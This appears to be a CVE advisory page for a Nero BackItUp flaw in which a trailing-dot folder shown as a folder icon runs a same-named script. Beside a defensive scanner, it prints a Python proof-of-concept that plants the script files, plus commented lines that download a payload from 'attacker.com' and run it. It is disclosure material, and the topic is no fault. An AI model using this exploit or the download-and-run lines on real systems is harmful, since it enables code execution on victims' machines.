Security Vulnerability Report
CVE-2025-63680 CVSS 8.6 HIGH

CVE-2025-63680

Published: 2025-11-14 19:16:01
Last Modified: 2026-01-12 14:56:55

Description

Nero BackItUp in the Nero Productline is vulnerable to a path parsing/UI rendering flaw (CWE-22) that, in combination with Windows ShellExecuteW fallback extension resolution, leads to arbitrary code execution when a user clicks a crafted entry. By creating a trailing-dot folder and placing a same-basename script, Nero BackItUp renders the file as a folder icon and then invokes ShellExecuteW, which executes the script via PATHEXT fallback (.COM/.EXE/.BAT/.CMD). The issue affects recent Nero BackItUp product lines (2019-2025 and earlier) and has been acknowledged by the vendor.
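The description above names the two ingredients a defender can look for: an entry whose name ends in a dot (or space) that the UI renders as a folder, and a file with the same basename and one of the listed PATHEXT fallback extensions next to it. The Python below is an added example, not code from this page, from the vendor, or from the advisory's author. It gives a detection scan over a directory listing plus an application-side check (`is_safe_to_open`) that refuses to hand such entries to the shell. The listing format, `SAMPLE_LISTING`, the `Finding` type and all function names are assumptions for illustration; the scan checks both inside the flagged folder (where this page's PoC places the script) and beside it.

```python
from __future__ import annotations

import os
import posixpath
from dataclasses import dataclass

# Extensions the advisory names for ShellExecuteW's PATHEXT fallback.
PATHEXT_FALLBACK = (".com", ".exe", ".bat", ".cmd")


@dataclass(frozen=True)
class Finding:
    folder: str  # entry rendered as a folder whose name ends in '.' or ' '
    script: str  # same-basename file carrying a PATHEXT extension


def has_trailing_dot_or_space(name: str) -> bool:
    """Names that Win32 path normalisation would strip; a UI may still render them."""
    return name != "" and name != name.rstrip(". ")


def is_safe_to_open(name: str, is_dir: bool) -> bool:
    """Application-side mitigation (assumed design, not the vendor's fix):
    only pass an entry to the shell when it really is a directory and its
    name survives normalisation unchanged."""
    return is_dir and not has_trailing_dot_or_space(name)


def scan_listing(listing: dict[str, list[tuple[str, bool]]]) -> list[Finding]:
    """listing maps a POSIX-style directory path to its (name, is_dir) children.
    Flags a trailing-dot/space folder that has a same-basename PATHEXT file
    either beside it or inside it."""
    findings: list[Finding] = []
    for parent, children in listing.items():
        for name, is_dir in children:
            if not is_dir or not has_trailing_dot_or_space(name):
                continue
            folder = posixpath.join(parent, name)
            base = name.rstrip(". ").lower()
            # Siblings first, then the folder's own children (the PoC on this
            # page drops the script inside the folder).
            candidates = [(parent, n, d) for n, d in children] + \
                         [(folder, n, d) for n, d in listing.get(folder, [])]
            for where, cname, cdir in candidates:
                if cdir:
                    continue
                stem, ext = os.path.splitext(cname)
                if stem.lower() == base and ext.lower() in PATHEXT_FALLBACK:
                    findings.append(Finding(folder, posixpath.join(where, cname)))
    return findings


def scan_tree(root: str) -> list[Finding]:
    """Build a listing from a real directory tree and scan it."""
    listing: dict[str, list[tuple[str, bool]]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        key = dirpath.replace(os.sep, "/")
        listing[key] = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
    return scan_listing(listing)


# Constructed sample listing (not a real backup set): one lure, one benign folder.
SAMPLE_LISTING = {
    "/backups": [("Backup.", True), ("Photos", True),
                 ("Backup.cmd", False), ("notes.txt", False)],
    "/backups/Backup.": [("Backup.bat", False), ("readme.txt", False)],
    "/backups/Photos": [("img.jpg", False)],
}

if __name__ == "__main__":
    for f in scan_listing(SAMPLE_LISTING):
        print(f"suspicious: {f.folder} -> {f.script}")
    for name, is_dir in SAMPLE_LISTING["/backups"]:
        print(f"{name!r}: safe to open = {is_safe_to_open(name, is_dir)}")
```

`scan_listing` is kept separate from the filesystem walk so the logic can be exercised on a constructed listing on any OS; `scan_tree` feeds it a real tree (for example a mounted backup volume) for an actual sweep.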

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nero:backitup:*:*:*:*:*:*:*:* - VULNERABLE
Nero BackItUp 2019
Nero BackItUp 2020
Nero BackItUp 2021
Nero BackItUp 2022
Nero BackItUp 2023
Nero BackItUp 2024
Nero BackItUp 2025
Nero Productline earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-63680 - Nero BackItUp Path Traversal RCE
# Author: Security Researcher
# Target: Nero BackItUp 2019-2025

import os
import shutil


def create_exploit_folder(base_name="Backup"):
    """
    Create trailing-dot folder with malicious script inside.
    This exploits ShellExecuteW PATHEXT fallback behavior.
    """
    # Create folder with trailing dot (becomes file in Windows)
    folder_path = os.path.join(os.getcwd(), f"{base_name}.")

    # Remove if exists
    if os.path.exists(folder_path):
        if os.path.isfile(folder_path):
            os.remove(folder_path)
        else:
            shutil.rmtree(folder_path)

    # Create as directory first
    os.makedirs(folder_path, exist_ok=True)

    # Create malicious script with same base name
    script_content = '''@echo off
rem CVE-2025-63680 PoC - Arbitrary Code Execution
rem This script executes when user clicks the fake folder
rem Replace with actual malicious payload
echo [+] CVE-2025-63680 Exploit Triggered > poc_triggered.txt
whoami >> poc_triggered.txt
date /t >> poc_triggered.txt
time /t >> poc_triggered.txt
rem Example: Download and execute payload
rem curl -o payload.exe http://attacker.com/payload.exe
rem start payload.exe
'''

    # Try multiple extensions for PATHEXT fallback
    for ext in ['.bat', '.cmd', '.exe', '.com']:
        script_path = os.path.join(folder_path, f"{base_name}{ext}")
        try:
            with open(script_path, 'w') as f:
                f.write(script_content)
            print(f"[+] Created: {script_path}")
        except Exception as e:
            print(f"[-] Failed to create {script_path}: {e}")

    print(f"\n[+] Exploit folder created: {folder_path}")
    print("[+] When Nero BackItUp displays this as folder and user clicks it,")
    print("[+] ShellExecuteW will execute the script via PATHEXT fallback")


if __name__ == "__main__":
    create_exploit_folder()
```

References

https://github.com/PotatoHamm/Nero-Productline-Vulnerability (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63680",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-14T19:16:01.360",
    "lastModified": "2026-01-12T14:56:54.810",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Nero BackItUp in the Nero Productline is vulnerable to a path parsing/UI rendering flaw (CWE-22) that, in combination with Windows ShellExecuteW fallback extension resolution, leads to arbitrary code execution when a user clicks a crafted entry. By creating a trailing-dot folder and placing a same-basename script, Nero BackItUp renders the file as a folder icon and then invokes ShellExecuteW, which executes the script via PATHEXT fallback (.COM/.EXE/.BAT/.CMD). The issue affects recent Nero BackItUp product lines (2019-2025 and earlier) and has been acknowledged by the vendor."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nero:backitup:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "2025",
                "matchCriteriaId": "C0417A0B-91DC-49AE-B1D5-0280F523AC70"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/PotatoHamm/Nero-Productline-Vulnerability",
        "source": "[email protected]",
        "tags": [
          "Exploit",
          "Third Party Advisory"
        ]
      }
    ]
  }
}
```